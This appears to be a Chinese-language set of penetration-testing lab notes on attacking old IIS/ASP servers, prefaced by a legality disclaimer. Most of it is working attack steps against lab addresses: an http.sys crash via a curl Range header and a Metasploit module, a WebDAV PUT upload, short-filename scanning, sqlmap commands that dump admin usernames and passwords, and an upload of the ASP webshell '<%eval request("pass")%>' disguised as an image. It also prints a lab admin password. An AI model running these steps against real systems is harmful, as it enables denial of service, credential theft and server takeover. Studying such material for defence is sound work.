041 asp

本文仅作为技术文档记录，学习使用，请合法合规，严格遵守《中华人民共和国网络安全法》。一切未经授权的渗透测试行为都是违法违规的。

1 http.sys蓝屏洞

用Linux输入

curl -v 192.168.37.129 -H "Host:192.168.37.129" -H "Range: bytes=0-18446744073709551615"

msfconsole

use auxiliary/dos/http/ms15_034_ulonglongadd

show options

设置端口set rhosts 192.168.37.129

show options

run

蓝屏成功

2 iis写权限

IIS<=6.0 目录权限开启写入，开启WebDAV，设置为允许

查看文件不存在

使用postman PUT请求http://192.168.37.128:89/3.TXT

注入成功

3 短文件泄露漏洞

主要是通过工具 获得asp应用泄露的短文件信息

cmd python iis_shortname_scan.py http://192.168.37.128:86/

就能泄露文件目录信息 python iis_shortname_scan.py http://192.168.37.128:86/database/

获得敏感信息/database/powere~1.mdb*

4 IIS文件解析

IIS 6 解析漏洞

1、该版本默认会将*.asp;.jpg 此种格式的文件名，当成Asp解析

2、该版本默认会将*.asp/目录下的所有文件当成Asp解析。

如：logo.asp;.jpg xx.asp/logo.jpg

IIS 7.x 解析漏洞

在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为php文件

应用场景：配合文件上传获取Webshell

5 ASP-SQL注入-SQLMAP使用&ACCESS注入

ACCESS数据库无管理帐号密码，顶级架构为表名，列名（字段），数据，所以在注入猜解中一般采用字典猜解表和列再获取数据，猜解简单但又可能出现猜解不到的情况，由于Access数据库在当前安全发展中已很少存在，故直接使用SQLMAP注入，后续再说其他。

python sqlmap.py -u "" --tables //获取表名

python sqlmap.py -u "" --cloumns -T admin //获取admin表名下的列名

python sqlmap.py -u "" --dump -C "" -T admin  //获取表名下的列名数据

存在注入点 使用SQLMAP

python .\sqlmap.py -u "http://192.168.37.128:89/Pic.asp?classid=3" –tables猜表名

获取到admin表

继续猜Tables中admin表中的数据

python .\sqlmap.py -u "http://192.168.37.128:89/Pic.asp?classid=3" --columns -T admin

获取到username 和password 继续猜

python .\sqlmap.py -u "http://192.168.37.128:89/Pic.asp?classid=3" --dump -C "username,password" -T admin

猜来源于admin表中的username 和password数据

6 利用文件解析上传webshell

http://192.168.37.128:89/upload.asp

admin panfei806

上传图片发现图片地址http://192.168.37.128:89/202452318404212661.jpg

验证成功

输入1.asp;.可以把图片当作asp解析

图片内容中添加后门代码<%eval request("pass")%>

链接地址http://192.168.37.128:89/1.asp;.20245231843934045.jpg

拿到权限